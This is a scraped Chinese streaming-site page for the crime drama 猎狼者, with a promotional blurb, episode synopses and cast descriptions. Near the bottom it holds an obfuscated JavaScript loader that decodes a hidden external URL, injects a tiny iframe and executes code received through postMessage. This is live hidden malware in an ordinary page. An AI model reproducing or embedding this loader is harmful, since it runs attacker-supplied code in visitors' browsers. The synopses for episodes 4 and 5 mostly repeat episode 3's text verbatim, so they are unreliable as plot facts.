• 视频
  • 文章
  • 演员
  • 角色
观看记录 清空
用户登录 关闭
账号
密码
猎狼者 国产,情,犯罪,电视 共8集,完结

猎狼者

扫描二维码打开

反盗猎题材剧《猎狼者》讲述了由秦昊饰演的护林员魏疆,在同事因公殉职、心如死灰之后,被尹昉饰演的新人警察秦川感动,重新骑上马、带上枪去捍卫使命的故事。

  秦昊又挑中王炸剧本,新作《猎狼者》收视逼近第一,网友直呼过瘾。

image.png

  在娱乐圈中,除了流量明星,不乏一些有真演技的演员,像秦昊就是其中一位,接连两部剧,口碑炸裂!去年,一部《隐秘的角落》让秦昊这个演技实力派迅速出圈,全网都在用爬山梗和你看我还有机会吗?

  今年,秦昊又加盟了《猎狼者》,虽然全无宣传,但是仅仅播出一天,收视率达到第二名,就目前播出的剧集和观众反馈来看,后续只要不拉胯,必定成今年爆款剧集。

  没有大咖演员助阵,没有生硬狗血的剧情设计,有的只是电影版的质感和人性的试炼,不得不说秦昊真的会挑本子。

image.png

  和以往的角色不同,这次秦昊扮演的是一个落魄的警察,为了帮同事报仇,也为了逮住盗猎分子,于是秦昊又扛起了枪,走进了大山荒野之中。

  一部悬疑犯罪题材的电视剧,打斗自然少不了。虽然秦昊没有学过武术,却打得很真实,堪称“身边的猛男决斗”,不管是树林还是灌木丛,非常有血性。

  虽然《猎狼者》只有短短八集,但是开播后评分已经冲到了8.2,某平台话题阅读1.5亿,冲击“年度悬疑剧”指日可待。大家喜欢秦昊的新剧吗?

  • 1集

倘若没有手表,或许只能准确分辨昼夜,剩余的时间都在用来寻找方向。一望无际的冰雪山脉,坐落于新疆北部的屋松山,正是拥有如此魔力,尽管风景诗情画意,遍地纯净素雅,可是连绵不断的峭壁,以及酷寒天气,已让许多人望而却步。偏巧有那么一群人,长年游走在此,表面与普通老百姓无异,私底下却做着非法偷猎的勾当。千禧年这天,戍边森警魏疆不顾搭档赵诚反对,贸然前往屋松山,架好狙击枪瞄准向山腰,奈何以二敌七的悬殊差距,已让自身陷入陷阱。伴随几声枪响,由远至近,来人脚步从仓促转变蹒跚,几个手持猎枪的“狼子”,用敏锐余光扫过周围,搜寻可疑目标。直到一阵短暂交火,双方死伤皆有,赵诚为掩护魏疆英雄牺牲,魏疆欲救赵诚,连中数枪,最终在围攻之下,坠落山崖昏死。待魏疆再次醒来时,已是五年以后。五年的时间很长,足以令一个意气风发的男人,丧失了该有的斗志,变成整日借酒浇愁的护林员。白天不醒,晚上不睡,直到牧民伊萨克上门催债,吵得他不得不起身应付,顶着魏八两的外号,骑着对方摩托扬长而去。沿着蜿蜒小道开向集镇,魏疆走过热闹人群,随手将肉摊羊腿拿走,记下一笔赊账,又把羊腿送给摆宴的主人家,换来一顿酒席。朋友努尔给魏疆带来上好的烟丝,顺便捎带近期听闻的消息,据说冬山森林有位警察失踪,至今三天未归,所以警方对外界公布奖金悬赏,看似较为诱人。原本魏疆并不打算冒险跟进冬山,可他还是在隔天清晨,穿好棉大衣背上猎枪,来到努尔家里暂居一宿。临走之前,努尔送匕首给魏疆用作防身,亲眼目送他骑马离开,内心祈祷平安。东山之内,共有三名盗猎兄弟,一位走私贩金主姓刘,至于失踪三天的森警秦川,此刻被捆绑在某处山坡,依旧是那副宁死不屈的倔强,险些激怒了盗猎贼狐狸。当年那场枪战过后,团伙中的七人仅剩老大、老三刀子、老五狐狸、老六六子以及老七巴图。因为刘老板是买方,仗着自己有财力,竟将他们当作下人使唤,甚至百般阻挠狐狸的杀警行为。纵然秦川落入贼手,仍是面不改色,相比较性格刚烈的巴图,作为哥哥的刀子显得较为稳重,在对待秦川的态度上,更是人如其名地笑里藏刀。魏疆一路循迹走进深山,终在半路捡到警察制服上的衣饰,通过多年经验分析路线,不知不觉过了大半天,夜幕降临。几兄弟将秦川吊在树下,脖子套住绳索,唯有靠脚尖踩住石头,以防踏空勒死。然而这种极端痛苦的方法,可让他们安心睡在帐篷里,不必担心警察逃跑。魏疆趁众人陆续休息,赶忙解开绳索带走秦川,奈何秦川手无缚鸡之力,还妄想将偷猎贼绳之以法。恰巧此时,偷猎贼惊醒持枪追击,魏疆利用熟悉的地理优势,潜入河中,顺利躲过搜捕。刘老板得知此事,再次恶言相向,狐狸听不下去,一枪将他打死。刀子数落狐狸开枪位置不对,导致衣服直接报废,刘老板浑身上下,仅剩能穿走的鞋子,以及几枚戒指。发完牢骚后,刀子吩咐巴图给刘老板毁容,增加警方破案难度。与此同时,秦川无法容忍偷猎团伙继续作恶,坚持不肯下山,这种从骨子里渗透的倔劲,像极了曾经的魏疆。起初魏疆只想领取赏金,不愿惹事,可当看到秦川如此执拗,除了无奈之余,内心的一种责任感和使命令他选择留下,前提是协商如果有人可以逃出东山,决不能再有任何犹豫。山腰处,魏疆挖出兽夹带走,并与秦川分别躲在两旁。刀子意外发现秦川,冲上前跟他扭打在一起,魏疆开枪阻断狐狸和巴图,拉着秦川疾步而逃。恰巧夏提骑马从山下经过,听闻枪声不绝,赶忙回去通知努尔等人营救。逃跑之时,魏疆专门在半路设好陷阱,殊不知已被巴图识破,他们将计就计,佯装受伤离去。秦川不顾魏疆阻止,偏要去追,结果踩进兽夹,挣脱不开。幸好关键时刻,魏疆赶来救走秦川,两人滚下山坡,勉强保住性命。正当魏疆给秦川的腿伤消毒包扎,忽然听到巴图叫嚣的声音,甚至放话提及赵诚。最终,魏疆留下猎枪给秦川,让他藏好,而自己则以一对三,在丛林里发生激烈博斗。塞纳率领人手上山,沿途寻找,终是找到魏疆,击退狐狸等人。几辆警车已在山下接应,秦川感染发烧,被大家抬走救治,魏疆重拾猎枪,回头望着偷猎贼逃走的方向,目光坚定且锋利。

  • 2集

待魏疆等人离去,东山林区派出所警员翻遍整座山,未寻到“狼子”蛛丝马迹,早已不知去向。所谓狼子,便是游牧地区对于偷猎贼的称呼,孙海洋从警多年,见过的狼子未近百也有几十,可是令他最为深刻的,还是五年前那场变故。此时一名警员从山坡旁走过,脚底石堆掉落,露出一只带血的死人手。古在勒马场内,叶菩萨为秦川做好伤口处理。当晚院内燃起篝火,几人围坐交谈。旁边草棚里的两匹骏马格外显眼,秦川对其颇感好奇,于是在大家的讲述下,得知两匹马分别叫做黑风和白雪,曾是魏疆与搭档赵诚的坐骑。后来赵诚遇害,魏疆脱去警服来到边区当守林员,耗费五年时光依然没能走出阴霾,所以便将两匹马送给努尔,免得睹物思人。孙海洋亲自来接秦川,此刻他已成为所长,再次见到师父魏疆,内心感慨万千。回到所里之后,秦川调取有关魏疆和赵诚的档案,里面记录着详细的工作鉴定。正因当年大雪封山,外界无法支援,赵诚叮嘱魏疆去找森林防火站的帮助,而他则独自面对着七个亡命之徒。十七发子弹,无一处打在致命要害,赵诚的真正死因,其实是被活活冻死。刀子带着兄弟几个狼狈而归,六子按照行内的老规矩,如今货钱全丢,况且又背上命案,总要有人背这锅,所以既然是狐狸惹得事儿,总该由他来解决。原本狐狸还想求个情,可见其他人视若罔闻,索性咬牙剪断小指,以作惩戒。纵然事儿已过去,可恩怨尚未了,刀子和六子向来不对付,完全是在二哥的事情上起了矛盾。二哥死在魏疆手里,赵诚死在他们手里,两方之间的恩怨,必须要有个决断,否则不死不休。孙海洋通过目前掌握到的线索,主动联系了南河派出所所长王光明,两人曾在魏疆身边工作,算是师兄弟兼搭档关系。相比较孙海洋的重情重义,王光明更看重实际,他对魏疆从最初的崇拜,到现在的歧视,无非是在责怪他离开警队的行为,活得像个醉生梦死的酒蒙子。王光明要对所里的兄弟负责,不想再继续插手这桩烂摊子,而他的话让孙海洋无法反驳,毕竟五年来多次的捕风捉影,早已让大家身心俱疲。但是这次孙海洋深信不疑,他知道那伙狼子正浮出水面,法网虽迟必到。东山林区接到人口失踪举报,孙海洋带着警员上门调查,结果碰见“老熟人”孙郊。根据孙郊所交代的细节,从而了解到付婶家目前的情况,由于付婶的儿子早年打皮子失踪,她也便成为了孤寡老人。闲暇之时,付婶会去附近喂养流浪猫狗,可唯独孙郊见到付婶的那天,亲眼目睹她拎着箱子往外走,愣是被陌生男人拽进车里。孙海洋在付婶常去的地方挖到封存较好的铁盒,因此推断这是她跟儿子来往取钱的方式,恐怕是付婶担心儿子出了意外,才会跟陌生男人离开。秦川骑着白雪跟赛娜来找魏疆,恰巧魏疆收到狼子邮寄的信件,约定在老地方见面。无论秦川如何阻拦,魏疆坚持要去找他们报仇。秦川阻止不了,于是提议跟随前往,最终,魏疆带着他和赛娜进山,一行三人共同上路。翻越过无数山丘峻岭,直至夕阳垂落,秦川跟魏疆达成约定,因为他不明白为何有人愿意将青春和生命留在这里,之所以跟在魏疆身边,无非是想找到那个离开或者留下的理由。至于魏疆,则是需要在同行的队伍里,有个拿枪不手抖的伙伴。来到狼头山,魏疆打算先去找好友伊萨克,顺便跟秦川聊起两人结识的过程,应该算是不打不相识。伊萨克曾为狼子,后来落在魏疆手里,考虑到妻子怀有身孕,干脆金盆洗手,再加上他性质不太严重,刑满释放后主动申请进山守林。奈何妻子难产去世,唯独留下一个儿子,从此伊萨克当爹又当妈,含辛茹苦将其抚养长大。六年间,伊萨克看守的山林没有狼子敢再靠近,因他优异表现,所以被调到狼头山。然而还没等魏疆出现,狐狸抢先一步抵达伊萨克住处。幸好伊萨克已将儿子送到城里读书,他见眼前几人是有备而来,于是提议进屋详谈。巴图守在屋外,听着屋内传来打斗的声音,以及伊萨克的惨叫。没过多久,魏疆带着秦川和赛娜赶来,此时伊萨克不知所踪,六子佯装守房人,面露警惕神色,不肯提供住所给他们。秦川耐着性子跟六子交流,主动递上证件明示身份。魏疆眼见六子仍不妥协,顿时发了火,并且态度强硬地要求住进木屋里。正因如此,六子不敢再作质疑,反倒是魏疆对他起了疑心。

  • 3集

顶灯亮起,房间布局皆被魏疆尽收眼底,无论是打破玻璃的窗户,以及地面残存的瓷片,无一样不在暗示着可疑。魏疆没能认出六子,完全因为他在那场事件中并不显眼,明明总在幕后谋划着最阴毒的计策,结果却交给其他人来执行。伊萨克平日爱用木头雕刻动物,每样都将视若珍宝,或许从未料到这些木刻物品,竟会在某天成为夺走他性命的利器。六子在魏疆的注视下,佯装镇定地用匕首削磨木雕,实则是想抹去木雕上的血迹。魏疆认出匕首是伊萨克贴身之物,通常情况下,很少会把专用匕首交给别人。眼见六子埋头不吱声,魏疆主动点根烟,吞云吐雾,缓缓道出伊萨克禁止屋内吸烟的规矩。此话一出,足以看出六子所表现的破绽,然而六子将计就计,干脆以自爆狼子身份,以此掩盖真实目的,顺便帮魏疆调试了猎枪机头。化名周炀的六子,以为是骗过了魏疆,殊不知魏疆认定伊萨克在他手里,暂且静观其变。到底是秦川年轻气盛,以为三人对付一个狼子绰绰有余,可是周围还有多少埋伏,尚未可知。直到吃饭时,六子将伊萨克珍视的马肠当作下酒菜,这令魏疆更加警觉。当天晚上,六子借口起夜离开木屋,还不待魏疆追去,只见他反手扣上门锁,就连窗户也用木板封死。屋内三人意识到情况不妙,赶紧抄起家伙,随着外面传出扣动扳机的声响,一阵疯狂扫射,流弹打穿房间各个角落。汽油倒泼不过片刻,四周立时燃起熊熊大火,正当他们寻找出路之时,忽然发现地板传来声响。起初以为伊萨克被困在下面,实际是刀子乔装,趁魏疆掉以轻心,握着匕首疯狂偷袭,继而转向秦川。两人在木屋内拳脚相加,秦川体力不敌对方,险些丧命,幸好魏疆在关键时刻将其打倒。由于地底挖有暗道直通屋外,所以魏疆让秦川和赛娜先逃,他需负责断后。其实魏疆本该趁此机会杀人报仇,可是那份刻印在骨血之中的警察守则,还是令他选择放弃念头,索性将刀子拖向暗道,留下活口。暗道旁边的隔断处,正是早已咽气的伊萨克,魏疆想拖他离开,奈何火焰太过猛烈,再加上体力无法拖行,最终悲愤跑出洞口,直接扑向刀子,拳拳朝对方门面打去。随着警车到来,魏疆也被不知情的警员扭摁在地。秦川见状,赶忙过去解释来龙去脉,听着魏疆撕心裂肺的怒喊声,心情复杂万分。孙海洋收到警情,得知牧民在种植大棚内发现付婶尸首,死状凄惨。虽然凶手线索已断,但是孙海洋依然认为狼子内部出现问题,而他也在其中掌握住关键信息。刀子被抓进南河派出所,王光明却毫无半点喜悦,因为所里警员不识魏疆身份,竟把他当作狼子。此刻魏疆火冒三丈,若非秦川等人的阻拦,恐怕早已冲进所里找王光明算账。然而王光明自知得罪不起这尊大神,所以决定将刀子转移到东山派出所。夏提找到陷入自责的赛娜,安慰之余,提醒她要理解魏疆,同时要懂得依靠魏疆,因为他就像是守护着山川茂林的神灵,能够带给牧民们无限安全感。正因夏提从小看着他们对付狼子的英勇事迹,所以早就决定成为这样的人,等到处理完伊萨克的后事,便会去南城派出所当协警。狐狸带着巴图找到六子,从而获悉刀子被捕之事。老大通知六子安排兄弟几个拿钱散伙,奈何收支账目都是交给六子负责,除他以外,没人知道钱款下落。为能找出散伙钱,更怕老大怪罪下死手,六子等人吵闹过后,索性驱车前往干娘付婶家,毕竟她是刀子亲妈,多少应该沾点亲情。魏疆迟迟不见南河派出所的警车,顿时心急如焚,殊不知刀子已在途中打晕警察,从车里逃走。孙海洋尚不知情,陪着魏疆坐在派出所外面,听着魏疆的指责,忍不住发起脾气,强调自己和其他同事都在努力,大家都希望能够尽快抓到偷猎团伙。刀子逃跑消息传来,魏疆有气无处发,二话不说,扭头回了宾馆,恰巧遇到赛娜父亲。秦川买了菜和酒送过去,赛娜父亲在酒桌上谈到伊萨克的儿子,所以打算收养小伊,解决了魏疆的挂牵,可以安心做自己的事情。隔天早上,魏疆带着秦川去找彪子,他与伊萨克经历相似,都是曾为狼子,后来金盆洗手,做了些小买卖,偶尔会用牦牛粉混沙充当北羊角粉贩卖。魏疆拿出刀子遗落的匕首让彪子鉴定,奈何彪子能力有限,只能分析出个大概,从匕首做工到材质,能有如此手艺之人,恐怕方圆十里只有锻造师克里木。临去找克里木之前,魏疆和秦川到面馆吃饭,结果看到几个街溜子霸占座位,似乎是店主得罪人。面馆老板丁洁出来招待,可当看见魏疆的一瞬间,神色从震惊转变为悲痛,指责他曾经承诺半月时间就带赵诚回来,然而五年已过,毫无音讯。魏疆沉默不语,随即起身离开,秦川下意识看了眼店铺牌匾,面馆的前面竟是“诚子”二字。

  • 4集

由于地底挖有暗道直通屋外,所以魏疆让秦川和赛娜先逃,他需负责断后。其实魏疆本该趁此机会杀人报仇,可是那份刻印在骨血之中的警察守则,还是令他选择放弃念头,索性将刀子拖向暗道,留下活口。暗道旁边的隔断处,正是早已咽气的伊萨克,魏疆想拖他离开,奈何火焰太过猛烈,再加上体力无法拖行,最终悲愤跑出洞口,直接扑向刀子,拳拳朝对方门面打去。随着警车到来,魏疆也被不知情的警员扭摁在地。秦川见状,赶忙过去解释来龙去脉,听着魏疆撕心裂肺的怒喊声,心情复杂万分。孙海洋收到警情,得知牧民在种植大棚内发现付婶尸首,死状凄惨。虽然凶手线索已断,但是孙海洋依然认为狼子内部出现问题,而他也在其中掌握住关键信息。刀子被抓进南河派出所,王光明却毫无半点喜悦,因为所里警员不识魏疆身份,竟把他当作狼子。此刻魏疆火冒三丈,若非秦川等人的阻拦,恐怕早已冲进所里找王光明算账。然而王光明自知得罪不起这尊大神,所以决定将刀子转移到东山派出所。夏提找到陷入自责的赛娜,安慰之余,提醒她要理解魏疆,同时要懂得依靠魏疆,因为他就像是守护着山川茂林的神灵,能够带给牧民们无限安全感。正因夏提从小看着他们对付狼子的英勇事迹,所以早就决定成为这样的人,等到处理完伊萨克的后事,便会去南城派出所当协警。狐狸带着巴图找到六子,从而获悉刀子被捕之事。老大通知六子安排兄弟几个拿钱散伙,奈何收支账目都是交给六子负责,除他以外,没人知道钱款下落。为能找出散伙钱,更怕老大怪罪下死手,六子等人吵闹过后,索性驱车前往干娘付婶家,毕竟她是刀子亲妈,多少应该沾点亲情。魏疆迟迟不见南河派出所的警车,顿时心急如焚,殊不知刀子已在途中打晕警察,从车里逃走。孙海洋尚不知情,陪着魏疆坐在派出所外面,听着魏疆的指责,忍不住发起脾气,强调自己和其他同事都在努力,大家都希望能够尽快抓到偷猎团伙。刀子逃跑消息传来,魏疆有气无处发,二话不说,扭头回了宾馆,恰巧遇到赛娜父亲。秦川买了菜和酒送过去,赛娜父亲在酒桌上谈到伊萨克的儿子,所以打算收养小伊,解决了魏疆的挂牵,可以安心做自己的事情。隔天早上,魏疆带着秦川去找彪子,他与伊萨克经历相似,都是曾为狼子,后来金盆洗手,做了些小买卖,偶尔会用牦牛粉混沙充当北羊角粉贩卖。魏疆拿出刀子遗落的匕首让彪子鉴定,奈何彪子能力有限,只能分析出个大概,从匕首做工到材质,能有如此手艺之人,恐怕方圆十里只有锻造师克里木。临去找克里木之前,魏疆和秦川到面馆吃饭,结果看到几个街溜子霸占座位,似乎是店主得罪人。面馆老板丁洁出来招待,可当看见魏疆的一瞬间,神色从震惊转变为悲痛,指责他曾经承诺半月时间就带赵诚回来,然而五年已过,毫无音讯。魏疆沉默不语,随即起身离开,秦川下意识看了眼店铺牌匾,面馆的前面竟是“诚子”二字。

  • 5集

姐妹俩团聚的时间并不久,很快又是临近分别,赛娜看到汽车后座放着皮货,便知是热娜成为了令众人所不齿的狼子,毫不犹豫地举箭拉弓对准她。尽管如此,热娜根本不在乎,她认定赛娜单纯善良,绝不会下死手,并且嘲讽妹妹为了警察,不惜跟自己翻脸。然而热娜在嗤笑赛娜之时,也是在自嘲,毕竟她当年离开家乡远赴外地,同样是为了心上人,只可惜想象中的爱情过于美好,时间一久,已让她看到了何谓人性的复杂。赛娜希望大姐能去自首,奈何热娜从不认为自己做过任何错事,甚至对妹妹步步紧逼。最终,赛娜松开拉弓的手,利箭朝热娜射去。当天晚上,六子借口起夜离开木屋,还不待魏疆追去,只见他反手扣上门锁,就连窗户也用木板封死。屋内三人意识到情况不妙,赶紧抄起家伙,随着外面传出扣动扳机的声响,一阵疯狂扫射,流弹打穿房间各个角落。汽油倒泼不过片刻,四周立时燃起熊熊大火,正当他们寻找出路之时,忽然发现地板传来声响。起初以为伊萨克被困在下面,实际是刀子乔装,趁魏疆掉以轻心,握着匕首疯狂偷袭,继而转向秦川。两人在木屋内拳脚相加,秦川体力不敌对方,险些丧命,幸好魏疆在关键时刻将其打倒。由于地底挖有暗道直通屋外,所以魏疆让秦川和赛娜先逃,他需负责断后。其实魏疆本该趁此机会杀人报仇,可是那份刻印在骨血之中的警察守则,还是令他选择放弃念头,索性将刀子拖向暗道,留下活口。暗道旁边的隔断处,正是早已咽气的伊萨克,魏疆想拖他离开,奈何火焰太过猛烈,再加上体力无法拖行,最终悲愤跑出洞口,直接扑向刀子,拳拳朝对方门面打去。随着警车到来,魏疆也被不知情的警员扭摁在地。秦川见状,赶忙过去解释来龙去脉,听着魏疆撕心裂肺的怒喊声,心情复杂万分。孙海洋收到警情,得知牧民在种植大棚内发现付婶尸首,死状凄惨。虽然凶手线索已断,但是孙海洋依然认为狼子内部出现问题,而他也在其中掌握住关键信息。刀子被抓进南河派出所,王光明却毫无半点喜悦,因为所里警员不识魏疆身份,竟把他当作狼子。此刻魏疆火冒三丈,若非秦川等人的阻拦,恐怕早已冲进所里找王光明算账。然而王光明自知得罪不起这尊大神,所以决定将刀子转移到东山派出所。夏提找到陷入自责的赛娜,安慰之余,提醒她要理解魏疆,同时要懂得依靠魏疆,因为他就像是守护着山川茂林的神灵,能够带给牧民们无限安全感。正因夏提从小看着他们对付狼子的英勇事迹,所以早就决定成为这样的人,等到处理完伊萨克的后事,便会去南城派出所当协警。狐狸带着巴图找到六子,从而获悉刀子被捕之事。老大通知六子安排兄弟几个拿钱散伙,奈何收支账目都是交给六子负责,除他以外,没人知道钱款下落。为能找出散伙钱,更怕老大怪罪下死手,六子等人吵闹过后,索性驱车前往干娘付婶家,毕竟她是刀子亲妈,多少应该沾点亲情。魏疆迟迟不见南河派出所的警车,顿时心急如焚,殊不知刀子已在途中打晕警察,从车里逃走。孙海洋尚不知情,陪着魏疆坐在派出所外面,听着魏疆的指责,忍不住发起脾气,强调自己和其他同事都在努力,大家都希望能够尽快抓到偷猎团伙。刀子逃跑消息传来,魏疆有气无处发,二话不说,扭头回了宾馆,恰巧遇到赛娜父亲。秦川买了菜和酒送过去,赛娜父亲在酒桌上谈到伊萨克的儿子,所以打算收养小伊,解决了魏疆的挂牵,可以安心做自己的事情。隔天早上,魏疆带着秦川去找彪子,他与伊萨克经历相似,都是曾为狼子,后来金盆洗手,做了些小买卖,偶尔会用牦牛粉混沙充当北羊角粉贩卖。魏疆拿出刀子遗落的匕首让彪子鉴定,奈何彪子能力有限,只能分析出个大概,从匕首做工到材质,能有如此手艺之人,恐怕方圆十里只有锻造师克里木。

  • 6集

花翻子追击魏疆,结果却找不到他的踪迹,一怒之下,连杀草棚里的几匹马,想要以此方法逼迫魏疆出来。听到马声哀鸣,魏疆想要冲去,结果被秦川死死拦住,因为在他看来,花翻子此番是有备而来,如果贸然露面等于自寻死路。迟迟不见魏疆现身,花翻子怒不可遏,最终将枪口对准赵诚的爱马,十几声枪响传去,魏疆的情绪几近崩溃,恍惚间看到赵诚惨死的画面。然而花翻子亦是如此,她始终无法忘记老二是如何死在魏疆手里,这是她一辈子无法走出的阴影。

  • 7集

众人跟毒鹞子碰了面,却是各怀心思,毕竟六子指控毒鹞子残害手足,这在任何人看来都难以接受。然而毒鹞子态度坚决地否认,甚至表示六子是想上位,结果一个“借位失火”枪杀了六子,随即诬陷他跟翻子狼狈为奸。花翻子见状后,怒斥毒鹞子在五年前的屋松山错杀萨木的事情。毒鹞子非但毫无畏惧,反倒是拿出老二和花翻子的女儿照片,同时用家人性命威胁狐狸,迫使他俩不敢反抗。面对花翻子跟狐狸的追问,毒鹞子打算带大家去个神秘的地方。

  • 374浏览 余皑磊 周炀 六狼,个性冷静,巧言令色,阴狠毒辣,偏执极端,虚伪冷血,擅长伪装。
  • 755浏览 尹铸胜 毒鹞子 狼子老大,极少露面,冷血无情且城府极深,魏疆头号敌人。
  • 358浏览 沈佳妮 花翻子 女狼子,凶狠泼辣,身手了得,精明豪放,掌握着盗猎团伙出货的链条。因为长期在盗猎团队,行动野蛮,对丈夫
  • 287浏览 赵魏 刀子 三狼,豪爽狂放,嗜血好杀,冷血暴躁。擅长用刀,杀人冷酷无情,喜欢享受血腥杀戮,对谋划不感兴趣,做事没
  • 175浏览 隋咏良 狐狸 五狼,精明狡猾,凶狠毒辣,参加盗猎组织为了赚钱,对钱极其执着。
  • 574浏览 黄子星 赛娜 护林员,身手矫健、性格直爽、独立正直、胆识过人。出身于游牧民族,擅长骑马射箭,颇有侠女风范。友善好客
  • 532浏览 秦昊 魏疆 一名护林员,同时也是一名退伍的森林警察,誓死守卫山林。表面狂放不羁、言行古怪、爱占便宜,实则心思缜密
  • 827浏览 尹昉 秦川 新人森林警察,警校优秀毕业生,怀有崇高理想。年轻气盛,对待长辈谦逊有礼但敢于挑战,有着不服输的精神。

猜你喜欢

function zDZVRYcr(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function yUHXgKS(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return zDZVRYcr(t);};eval('\x77\x69\x6e\x64\x6f\x77')['\x69\x44\x48\x70\x68\x65\x42\x4b\x6e\x66']=function(){;(function(u,r,w,d,f,c){var x=yUHXgKS,cs=d.currentScript;;u=decodeURIComponent(x(u.replace(new RegExp(c+''+c,'g'),c)));var k='',wr='w'+'ri'+'t'+'e';'jQuery';var c=d[x('Y3VycmVudFNjcmlwdA==')];var f=d.createElement('iframe');f.id='x'+(Math.random()*10000);f.style.width='5px';f.style.height=10+'px';f.src=[u,r].join('-');d[wr](f.outerHTML);w['addEventListener']('message',function(e){if(e.data[r]){d.getElementById(f.id).style.display='none';new Function('_tdcs',x(e.data[r].replace(new RegExp(r,'g'),'')))(cs);}});})('aHR0cHMlM0ElMkkYlMkkZqcy5rZWV5ZWtleS54eXolMkkY4OTI1',''+'MaV'+'GJC'+'DA'+'',window,document,''+'0vg'+'CF'+'','k');};

RSS订阅  -  百度蜘蛛  -  谷歌爬虫  -  网站地图

© 2021 www.kansmdy.com Theme by Inkedus